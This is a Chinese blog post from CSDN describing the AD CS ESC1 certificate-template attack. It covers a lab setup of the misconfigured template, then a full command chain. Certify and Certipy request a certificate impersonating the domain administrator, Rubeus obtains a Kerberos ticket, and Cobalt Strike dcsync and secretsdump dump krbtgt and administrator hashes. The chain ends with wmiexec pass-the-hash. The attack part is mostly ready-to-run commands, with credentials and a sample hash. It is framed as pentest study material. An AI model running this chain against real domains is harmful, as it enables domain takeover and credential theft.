ADCS攻击之证书模板配置错误 ESC1

已于 2023-03-06 00:23:32 修改
阅读量846 收藏 1
点赞数
分类专栏: 内网渗透 文章标签: ADCS攻击 证书模板配置错误 ESC1 内网渗透 ADCS Powered by 金山文档
于 2023-03-05 23:45:54 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/adminxe/article/details/129353293
版权
漏洞配置

使用certtmpl.msc创建

右键复制工作站身份认证模板,做一些修改

利用条件

ESC1利用前提条件:

  • msPKI-Certificates-Name-Flag: ENROLLEE_SUPPLIES_SUBJECT 表示基于此证书模板申请新证书的用户可以为其他用户申请证书,即任何用户,包括域管理员用户

  • PkiExtendedKeyUsage: Client Authentication 表示将基于此证书模板生成的证书可用于对 Active Directory 中的计算机进行身份验证

  • Enrollment Rights: NT Authority\Authenticated Users 表示允许 Active Directory 中任何经过身份验证的用户请求基于此证书模板生成的新证书

创建模板ESC1开启ENROLLEE_SUPPLIES_SUBJECT:

将模板用于客户端身份验证(Client Authentication):

设置权限允许普通用户注册(Authenticated Users or Domain Users):

认证后的用户/域用户随便勾一个就行了

枚举证书漏洞
利用
域内:
#检测是否存在漏洞 

execute-assembly Certify.exe find /vulnerable 

报错!!

发现存在漏洞,为域管请求证书,转换格式,请求TGT,PTT:

# zhang 是一个普通域用户,用域用户去申请证书
# 在域用户或者system下执行
# CS的内存加载本地C#程序,无需落地:
# 在普通域用户下,获取证书,注意altname参数,这个需要填的是域管用户名。

execute-assembly \path\Certify.exe request /ca:【CA Name】 /template:VulnTemplate /altname:domadmin
openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
execute-assembly \path\Rubeus.exe asktgt /user:<$adUserToImpersonate> /certificate:cert.pfx /ptt
====================================================================================
Certify.exe request /ca:adcs.attack.cn\attack-ADCS-CA -stdout /template:ESC1 /altname:administrator
直接通过证书获取TGT:
openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
Rubeus.exe asktgt /user:Administrator /certificate:administrator.pfx /ptt

Rubeus 通过证书获取TGT:

注:将生成的cert.pem先保存到txt,然后重命名为cert.pem

pem转换pfx证书,直接回车,不需要输入密码,申请TGT票据

#通过openssl转换证书
openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
​
#将pfx证书转换为base64
cat cert.pfx | base64 -w 0
​
execute-assembly Rubeus.exe asktgt /user:administrator /certificate:base64 /aes256 /nowrap
​
Rubeus.exe asktgt /user:administrator /certificate:base64 /aes256 /nowrap
Rubeus.exe asktgt /user:Administrator /certificate:base64 /ptt
​
CS可直接执行:
beacon> dcsync attack.cn ATTACK\krbtgt
beacon> dcsync attack.cn ATTACK\Administrator
beacon> dcsync attack.cn

域外

# 测试漏洞
certipy find -u zhang@attack.cn -p 321.com -dc-ip 192.168.11.11 -vulnerable -stdout

发现存在ESC1可利用的模板,为域管请求证书,转换格式,请求TGT,DCSync或者PTT:

target为ADCSIP
certipy req -u zhangsan@red.lab -p zs@123456 -target 192.168.149.135 -ca red-ADCS-CA -template ESC1 -upn administrator@red.lab
certipy auth -pfx administrator.pfx -dc-ip 192.168.149.133
secretsdump.py red.lab/administrator@192.168.149.133 -just-dc-user red/krbtgt -hashes :nthash
=============================================
# 实测template为创建模板的名字,ESC1只是为了文中表达,根据具体模板更改
certipy req -u 'zhang'@attack.cn -p '321.com' -target 192.168.11.12 -ca attack-adcs-Ca -template ESC1 -upn administrator@attack.cn

certipy auth -pfx administrator.pfx -dc-ip 192.168.11.11

secretsdump.py attack.cn/administrator@192.168.11.11 -just-dc-user ATTACK/krbtgt -hashes :nthash
secretsdump.py attack.cn/administrator@192.168.11.11 -hashes :161cff084477fe596a5db81874498a24

# 哈希传递
python3 .\wmiexec.py attack/administrator@192.168.11.11 -hashes :XXXXX

转载请注明:Adminxe's Blog » ADCS攻击之证书模板配置错误 ESC1

Adminxe
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Windows网络操作系统配置与管理单元十二任务1:配置ADCS实验报告.doc
05-15
Windows网络操作系统配置与管理单元十二任务1:配置ADCS实验报告.doc
windows server 2008 R2证书申请及安装配置
01-07
Windows Server 2008 R2 证书申请及安装配置是一个复杂的过程,需要按照步骤进行操作,否则可能会出现错误。同时,需要注意证书的申请、安装和配置必须在管理员 administrator 登录下进行,否则可能会出现权限问题。
AD CS证书攻击与防御:ESC1
最新发布
ATpiu的博客
11-05 537
针对域内AD CS攻击攻击手法主要是利用证书模版配置证书模版访问权限配置,PKI访问权限配置和CA访问权限配置错误,导致的windows域内权限提升或持久化。
域渗透笔记-ADCS 域提权-ESC1
NoooEmotion的博客
02-02 1570
AD CS(Active Directory 证书服务)中的企业CA使用证书模板定义设置颁发证书,这些证书模板是注册策略和预定义证书设置的集合,并包含诸如此证书的有效期是多长?、证书的用途是什么?、主题是如何指定的?、谁可以申请证书?,以及无数其他设置。证书模板有一组特定的设置,这使得它们非常容易受到攻击
域渗透笔记-ADCS 域提权-ESC3
NoooEmotion的博客
02-03 430
AD CS(Active Directory 证书服务)中的企业CA使用证书模板定义设置颁发证书,这些证书模板是注册策略和预定义证书设置的集合,并包含诸如此证书的有效期是多长?、证书的用途是什么?、主题是如何指定的?、谁可以申请证书?,以及无数其他设置。证书模板有一组特定的设置,这使得它们非常容易受到攻击
证书安装提示模板权限相关问题!
技术与管理的平衡木-
10-30 6612
  我在安装证书服务时出现了如下警告信息:     安装程序无法安装或更新默认的证书模板。请确保您对林根域中的“证书模板”容器有写的权限,然后使用命令 Certutil -installdefaulttemplates 手动安装默认的证书模板。访问权限不够。访问权限不够,不能执行该操作。0x80072098 (win32:8344)     请问是什么导致了该问题?该如何解决这样的问题?  期待您的回复!谢谢! 根据您的描述,我的理解是您在安装证书服务的时候被提示没有“证书模板”容器的写权限,从而导致
域控搭建证书颁发机构,申请证书提示找不到证书模板问题演示讲解
weixin_54032452的博客
08-10 2055
该问题的产生大概率是在添加证书服务前未安装WEB服务器(IIS)。在这里采用Windows server 2022进行演示。
ADCS Class.zip_ADCS class_ADCS labview_OBD诊断_volkswagen_汽车CAN
07-14
该源代码是基于车载平台上的通讯诊断协议, 能够利用LabVIEW, LabWindows?/CVI, Visual C/C++ 6.0中基于CAN的汽车诊断 兼容Windows 7/Vista/XP/2000和LabVIEW Real-Time 诊断协议:CAN (ISO 15765, OBD-II)的KWP2000 ...
Interfacing to High Speed ADCs via SPI
07-31
Interfacing to High Speed ADCs via SPI
3ADCs_DMA.rar
12-24
1. 示例代码:用C语言或汇编语言编写的STM32 ADC和DMA配置及数据读取的代码片段,展示如何初始化ADC,设置DMA通道,以及处理转换完成的中断等。 2. 用户手册或参考手册:详述STM32系列芯片的ADC和DMA模块的硬件特性...
Windows CA 证书服务器配置—— Microsoft 证书服务安装
04-15
图文并茂,详细讲述如何在Windows server 2003系统上安装配置CA服务器安装和配置,适用于安全机制的配置
certsrv:一个简单的证书服务器,用于生成和维护CA权限并颁发证书
04-25
初始设置 尚未到来(某天)
授权证书模板
09-22
结业证书模板PSD素材模板 本科学历证书模板 结业证书模板模板 初中学历证书模板高中结业证书模板模板在线可编辑 高中结业证书模板模板 PSD素材可修改结业证书 培训结业
自制证书时报"此证书模板上的权限允许当前用户注册类型证书"的解决办法
Vic的博客
10-16 5655
当你在用powershell进行证书申请处理操作时,弹出如下图中的错误,你第一件要检查的事是你是否以管理员身份运行了powershell,如果没有则使用管理员身份运行,看是否能解决你的问题,如果能解决最好,如果解决不了则继续找其他原因。
证书服务器web注册,无法通过 Web 注册请求证书 - Windows Server | Microsoft Docs
weixin_42350514的博客
08-01 1657
无法使用 Web 注册请求证书09/11/2020本文内容本文针对使用 Web 注册无法请求证书的问题提供了解决方案。适用于: WindowsServer 2008 R2 Service Pack 1原始 KB 编号: 2885758症状当您浏览 CA 网站以请求证书,并单击"请求证书",然后单击"创建请求并提交到此 CA"时,您收到以下消息:为了完成证书注册,CA 的网站必须配置为使用 H...
域渗透笔记-ADCS 域提权-ESC4
NoooEmotion的博客
02-06 899
AD CS(Active Directory 证书服务)中的企业CA使用证书模板定义设置颁发证书,这些证书模板是注册策略和预定义证书设置的集合,并包含诸如此证书的有效期是多长?、证书的用途是什么?、主题是如何指定的?、谁可以申请证书?,以及无数其他设置。证书模板有一组特定的设置,这使得它们非常容易受到攻击
域渗透笔记-证书服务器(ADCS)安装
NoooEmotion的博客
02-02 2151
AD CS证书服务(SSL证书):可以部署企业根或独立根建立SSL加密通道,这是所有服务器证书,无论品牌、申请方式都可以起到的功能,唯一的价值区别在于加密强度,目前,达到128位对称加密强度的服务器证书均可以实现有保障的加密通道。
CA服务器迁移之后,使用IE浏览器申请证书提示无法找到证书模板
weixin_33969116的博客
11-03 1854
问题描述:CA服务器迁移之后,使用IE浏览器申请证书提示无法找到证书模板,截图如下:问题原因分析:…………………………………………………………………………………………………………………………………………………………………………使用certutil命令查看当前证书信息,发现有两个证书条目信息截图如下运行certutil ca 命令发现DNSname指向的还是旧的服务器,于是判定...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Adminxe

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值